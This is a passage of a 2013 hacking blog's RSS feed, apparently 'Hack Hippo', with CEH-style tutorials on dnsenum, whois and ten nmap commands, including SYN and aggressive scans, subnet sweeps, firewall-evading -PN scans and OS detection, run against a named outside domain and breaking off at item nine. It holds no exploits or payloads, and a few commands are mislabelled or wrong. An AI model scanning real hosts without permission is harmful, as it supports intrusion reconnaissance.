&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTfTQ51Y3yPMj4o-JS4PnpKDTzobtxMPZsmUZgS7TaLx5d30xHYYIzU2PIpn62j5UntTYXnPE7LWb6svXNujr5eRlvVAC149LNY8sssK5PjBBUO1pd3FLbll-bvKXOspyy9EUms4K3FM/s1600/dnsenum2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTfTQ51Y3yPMj4o-JS4PnpKDTzobtxMPZsmUZgS7TaLx5d30xHYYIzU2PIpn62j5UntTYXnPE7LWb6svXNujr5eRlvVAC149LNY8sssK5PjBBUO1pd3FLbll-bvKXOspyy9EUms4K3FM/s1600/dnsenum2.JPG" height="141" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
Thanks To visit Hack Hippo i Hope you like it, if you have any doubt feel free comments.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
© HaCkHiPp0-TeaM.&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
R0oTx:Sahil_Rai,&amp;nbsp;Manish Pathak (1337C001),&amp;nbsp;p7771 (p@nku k@p0or)&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/11/dns-information-gathering-tool.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheV0KridWzFiFOkw2jGtUEZ3xJxsbuWaYCkYd0pzfGp1leFTyutdbcLD532bTmEcEI9ElcPNqYbEbwbufcIrUhSZC3-JjsqtItRwXlnD2HeUCerfSp2PYpgnwKwnSYYZqm7yqO5c6Xkp4/s72-c/dnsenum.JPG" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-9124891456093150182</guid><pubDate>Wed, 06 Nov 2013 10:17:00 +0000</pubDate><atom:updated>2013-11-11T08:46:10.204-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Footprinting</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Scanning</category><title>How to use whois in Backtrack</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: center;"&gt;
How to use whois in Backtrack&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
Steps : open terminal and just type this command &lt;span style="color: lime;"&gt;apt-get install update&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: lime;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
Step 2: whois (target website name )&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; Ex: whois secinside.in&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="color: lime;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguA074G-uMu-3pIlpystGhb7zYo-0quqHdU_R1z9NIDjRebfv3pVB3HSURfQy4Ss7YJMng5htbu4AB6CJWbaLKGsYp4iB_b7NCs6oxXF6YvaYLJAxCXkzwjhYN8_6jVPJKeVj7YhSpSnk/s1600/whois.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguA074G-uMu-3pIlpystGhb7zYo-0quqHdU_R1z9NIDjRebfv3pVB3HSURfQy4Ss7YJMng5htbu4AB6CJWbaLKGsYp4iB_b7NCs6oxXF6YvaYLJAxCXkzwjhYN8_6jVPJKeVj7YhSpSnk/s1600/whois.JPG" height="155" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghxrU9RgFnofx_H2ziPwt6WadYnxHE_ctLOodCJhnXkZhNjYkODZXGqQ3zJ1aC-Z2w3KFldY58KRqQLDLDRhAyVHqUAA5tHl0KnrXQt1EOnihuDl_lRT_I4ctEpEfvp4bQo_I2KoyPHR4/s1600/whois2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghxrU9RgFnofx_H2ziPwt6WadYnxHE_ctLOodCJhnXkZhNjYkODZXGqQ3zJ1aC-Z2w3KFldY58KRqQLDLDRhAyVHqUAA5tHl0KnrXQt1EOnihuDl_lRT_I4ctEpEfvp4bQo_I2KoyPHR4/s1600/whois2.JPG" height="274" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqbc9GDM-h-hXnUKu0HsjLIKLgX_D9x0hX7RS4jYbvlyWaLRK195D6I_t3EcZZFnQV_tSiQsO2MhIqtLKXbtBxai54IrR2Hs3Im0kH5_eZKLT7pXtpGwOAdk0ukxQg7DKTXnN0wUCuOQ/s1600/whois3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqbc9GDM-h-hXnUKu0HsjLIKLgX_D9x0hX7RS4jYbvlyWaLRK195D6I_t3EcZZFnQV_tSiQsO2MhIqtLKXbtBxai54IrR2Hs3Im0kH5_eZKLT7pXtpGwOAdk0ukxQg7DKTXnN0wUCuOQ/s1600/whois3.JPG" height="240" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
Thanks To visit Hack Hippo i Hope you like it, if you have any doubt feel free comments.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
© HaCkHiPp0-TeaM.&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
R0oTx:Sahil_Rai,&amp;nbsp;Manish Pathak (1337C001),&amp;nbsp;p7771 (p@nku k@p0or)&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/11/how-to-use-whois-in-backtrack.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguA074G-uMu-3pIlpystGhb7zYo-0quqHdU_R1z9NIDjRebfv3pVB3HSURfQy4Ss7YJMng5htbu4AB6CJWbaLKGsYp4iB_b7NCs6oxXF6YvaYLJAxCXkzwjhYN8_6jVPJKeVj7YhSpSnk/s72-c/whois.JPG" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-8052430368250392942</guid><pubDate>Thu, 31 Oct 2013 11:30:00 +0000</pubDate><atom:updated>2013-11-11T08:46:26.590-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Scanning</category><title>Nmap Top 10 Commands</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
10 nmap Commands&lt;/h2&gt;
&lt;div&gt;
&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;#1 Scan a single host or an IP address (IPv4)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
nmap 192.168.1.1&lt;br /&gt;
Or&lt;br /&gt;
nmap secinside.in&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
Output&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg98APXdALy14vET3wp6exW773zPg39t5RaW7VnkdaSFybReWu9vlqnAle3evrYnzv4uCD4oAIQN8bORkbkPx52dzXEJG0YUKc5C4tDSRiRhWjmRwVvvH7eYh-yRqPzxhm09rWh-0hLvxw/s1600/Nmap-Single-host-scann-ip.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg98APXdALy14vET3wp6exW773zPg39t5RaW7VnkdaSFybReWu9vlqnAle3evrYnzv4uCD4oAIQN8bORkbkPx52dzXEJG0YUKc5C4tDSRiRhWjmRwVvvH7eYh-yRqPzxhm09rWh-0hLvxw/s1600/Nmap-Single-host-scann-ip.JPG" height="248" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaf8m-I7LxmFzD5uiCdxlXfG-jZByDOUImLpFbZ9sjPFN8y00yFHOHhs2Wg2BRRFKPJGd2BPA4miMkjr8SpzkADwHKd2hTi5R9rZqobWR2N0xodgrr1LzuXwLAuytyMr7bw0ciFPWJg6I/s1600/Nmap-Single-host-scann.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaf8m-I7LxmFzD5uiCdxlXfG-jZByDOUImLpFbZ9sjPFN8y00yFHOHhs2Wg2BRRFKPJGd2BPA4miMkjr8SpzkADwHKd2hTi5R9rZqobWR2N0xodgrr1LzuXwLAuytyMr7bw0ciFPWJg6I/s1600/Nmap-Single-host-scann.JPG" height="320" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#2 Nmap Syn Stelth Scan&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&amp;nbsp;nmap -v -A secinside.in&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;Output&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM40Cubl48sQLrIlztljjGJjfVv9E8T7HlyyCox4bNDMsb3lWKnwQd0fm_jk0tbPluPDKOHU3we52TMW5-eQDJGT6a6EUmCu072tzBgAuPe7qIPlGnd30AgheCV1GmDrl-3kftIbvCjoQ/s1600/Nmap-Syn-Stelth-Scan.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM40Cubl48sQLrIlztljjGJjfVv9E8T7HlyyCox4bNDMsb3lWKnwQd0fm_jk0tbPluPDKOHU3we52TMW5-eQDJGT6a6EUmCu072tzBgAuPe7qIPlGnd30AgheCV1GmDrl-3kftIbvCjoQ/s1600/Nmap-Syn-Stelth-Scan.JPG" height="318" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNbkVWD-7qjlM07PRUwnLyPL9qO00RPugjztd51qqxxCDoWptCD7v5wB_lUqrwFZFMiZ3uwqIZ4AdhwhEiIri_Y7QG6B0YJ5IVmMw1imsvJ237qfS-qg6IvZP_HVQes7Gi-8E23POs28k/s1600/Nmap-Syn-Stelth-Scan2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNbkVWD-7qjlM07PRUwnLyPL9qO00RPugjztd51qqxxCDoWptCD7v5wB_lUqrwFZFMiZ3uwqIZ4AdhwhEiIri_Y7QG6B0YJ5IVmMw1imsvJ237qfS-qg6IvZP_HVQes7Gi-8E23POs28k/s1600/Nmap-Syn-Stelth-Scan2.JPG" height="304" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMwnO6q44dKroEcfDtUYDjbCCinJZeNGL_jp3EtlNN0jdgXqFk2LRG3B_X_N3zZDz3i3KrzwTtPV989SrmEwjRjkwn9VPIEfFQyo6hPUsYyeFJOfEwVtsrArHgQUudq_jVJgGCQcRLZm4/s1600/Nmap-Syn-Stelth-Scan3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMwnO6q44dKroEcfDtUYDjbCCinJZeNGL_jp3EtlNN0jdgXqFk2LRG3B_X_N3zZDz3i3KrzwTtPV989SrmEwjRjkwn9VPIEfFQyo6hPUsYyeFJOfEwVtsrArHgQUudq_jVJgGCQcRLZm4/s1600/Nmap-Syn-Stelth-Scan3.JPG" height="241" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuv3kWtkTdQiHSF-KvdEeGs7o1n9FQW1SCmiGLH_60jBKXngh4gOuv_vAR9SrCfn7LZ9YOPNdsUDSlnrCY-uAEXY8FW83CreE3tT0jRL5YK06k9NnWkFF51ZnEwiGM9mwOtm5VUmIYdzg/s1600/Nmap-Syn-Stelth-Scan4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuv3kWtkTdQiHSF-KvdEeGs7o1n9FQW1SCmiGLH_60jBKXngh4gOuv_vAR9SrCfn7LZ9YOPNdsUDSlnrCY-uAEXY8FW83CreE3tT0jRL5YK06k9NnWkFF51ZnEwiGM9mwOtm5VUmIYdzg/s1600/Nmap-Syn-Stelth-Scan4.JPG" height="248" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#3 Nmap Complete Network Host Scann &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;nmap -sP 192.168.1.0/24&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZXVJdXZHaXPiLHI6-Ff32ebeuMjOlCISwRUbHUM83mVy4Cmm8BmbbIIhAyTv_MBUacNomc3kylB7YsjbpTojcH0Q7f-lpX7AfBa4AQ2u3jAfYWAYM3b-Ko9yXyh-4P7O69NbpN9oECo/s1600/Nmap+Discover+IP%E2%80%99s+in+a+subnet.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZXVJdXZHaXPiLHI6-Ff32ebeuMjOlCISwRUbHUM83mVy4Cmm8BmbbIIhAyTv_MBUacNomc3kylB7YsjbpTojcH0Q7f-lpX7AfBa4AQ2u3jAfYWAYM3b-Ko9yXyh-4P7O69NbpN9oECo/s1600/Nmap+Discover+IP%E2%80%99s+in+a+subnet.JPG" height="207" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#4 Only show open (or possibly open) ports&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;nmap --open 192.168.1.1&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt; &lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;nmap --open secinside.in&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZTNVOcynsDc9qfOoZn0ni4Zje2HUD0GAQhyaQqH7mwA8mzRTKdH5BlToRRKwrKGvUCEbbDhLiqA5oyhazuuytXmtjp9NhKHFImzbqnh25R6U1Y-MnU9tLSBkijV8rDl1a7Tmx2WFOCv8/s1600/Only+show+open+ports.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZTNVOcynsDc9qfOoZn0ni4Zje2HUD0GAQhyaQqH7mwA8mzRTKdH5BlToRRKwrKGvUCEbbDhLiqA5oyhazuuytXmtjp9NhKHFImzbqnh25R6U1Y-MnU9tLSBkijV8rDl1a7Tmx2WFOCv8/s1600/Only+show+open+ports.JPG" height="259" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#5: Scan a host using UDP ping&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -PU 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif3EsoOtAUjbC8k7wzz9TOGhVx40gE99rJLES5mQJMpfcPJFtiRNCoD70EqULsStb4UQsOfszx1Zkd5XDmJZE25X-OaTMgrNIUMwlMnDYIC_wa_MjnS0fmGAO-4plvoR7mj4K7htlrZqc/s1600/Scan+a+host+using+UDP+ping.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif3EsoOtAUjbC8k7wzz9TOGhVx40gE99rJLES5mQJMpfcPJFtiRNCoD70EqULsStb4UQsOfszx1Zkd5XDmJZE25X-OaTMgrNIUMwlMnDYIC_wa_MjnS0fmGAO-4plvoR7mj4K7htlrZqc/s1600/Scan+a+host+using+UDP+ping.JPG" height="213" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#6: Scan a host when protected by the firewall&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -PN 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap -PN secinside.in&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMDDMdql2vMJhFThcH17vWN_Vy8MlQjuo97C_aHOBf7A5Hsx_gDmg9GrEsBuivX425YgDGRxfEM1g43exv4jUa5rfaN_3THQZP6uqVMP9m6mfxv9MsEGv-d5M7FTGj99v72t48hgWBNMo/s1600/Scan+a+host+when+protected+by+the+firewall.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMDDMdql2vMJhFThcH17vWN_Vy8MlQjuo97C_aHOBf7A5Hsx_gDmg9GrEsBuivX425YgDGRxfEM1g43exv4jUa5rfaN_3THQZP6uqVMP9m6mfxv9MsEGv-d5M7FTGj99v72t48hgWBNMo/s1600/Scan+a+host+when+protected+by+the+firewall.JPG" height="149" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;#7: Show all packets sent and received&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap --packet-trace 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap --packet-trace secinside.in&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE5mhx_CnAkP4z9cWF_6krfMIgMgCueO55Hxt_23CdQ7x3iya5ivWaCi10syRrREbkNgNyoLPxnC2F6khXVrMhs3FpkS0VcV86d_CkPHAHQ3HpZqpBnmT82y9LXrCaFKwFnpV8ZOvENFI/s1600/Show+all+packets+sent+and+received.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE5mhx_CnAkP4z9cWF_6krfMIgMgCueO55Hxt_23CdQ7x3iya5ivWaCi10syRrREbkNgNyoLPxnC2F6khXVrMhs3FpkS0VcV86d_CkPHAHQ3HpZqpBnmT82y9LXrCaFKwFnpV8ZOvENFI/s1600/Show+all+packets+sent+and+received.JPG" height="227" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;#8: Display the reason a port is in a particular state&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap --reason 192.168.1.1&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
nmap --reason secinside.in&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFHAbVGwA3uPLV_aKhjMc8u81nyl8_zNhWPS5S6WcVWjzfXALjuMAPUQG394Cxoqd7DQIUsccoqyNYapYObUr8KkOKr1p8fXSawmmp0KL2fR3gUdsGfybph6ZuNwLWn9P7l7WpxrM9nSE/s1600/Display+the+reason+a+port+is+in+a+particular+state.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFHAbVGwA3uPLV_aKhjMc8u81nyl8_zNhWPS5S6WcVWjzfXALjuMAPUQG394Cxoqd7DQIUsccoqyNYapYObUr8KkOKr1p8fXSawmmp0KL2fR3gUdsGfybph6ZuNwLWn9P7l7WpxrM9nSE/s1600/Display+the+reason+a+port+is+in+a+particular+state.JPG" height="320" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;#9: How do I detect remote operating system?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
You can identify a remote host apps and OS&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
using the -O option:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
nmap -O 192.168.1.1&lt;/div&gt;
&lt;div&gt;
nmap -v -O 192.168.1.1&lt;/div&gt;
&lt;div&gt;
nmap -O secinside.in&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5mbcroS_5xhyphenhyphenh9qVuiLKgk6zPWJ_W8blkyGvXEkOGiu8Z7zgzRn5JRIOY3uq2KAHm7N5iBq3CCMKnOKstzPgVYl6qBMFprYNQU06U2cmntXdHW6eyq_wJvoRI2pmyWwh083lslAupLWc/s1600/How+do+I+detect+remote+operating+system+2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5mbcroS_5xhyphenhyphenh9qVuiLKgk6zPWJ_W8blkyGvXEkOGiu8Z7zgzRn5JRIOY3uq2KAHm7N5iBq3CCMKnOKstzPgVYl6qBMFprYNQU06U2cmntXdHW6eyq_wJvoRI2pmyWwh083lslAupLWc/s1600/How+do+I+detect+remote+operating+system+2.JPG" height="256" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
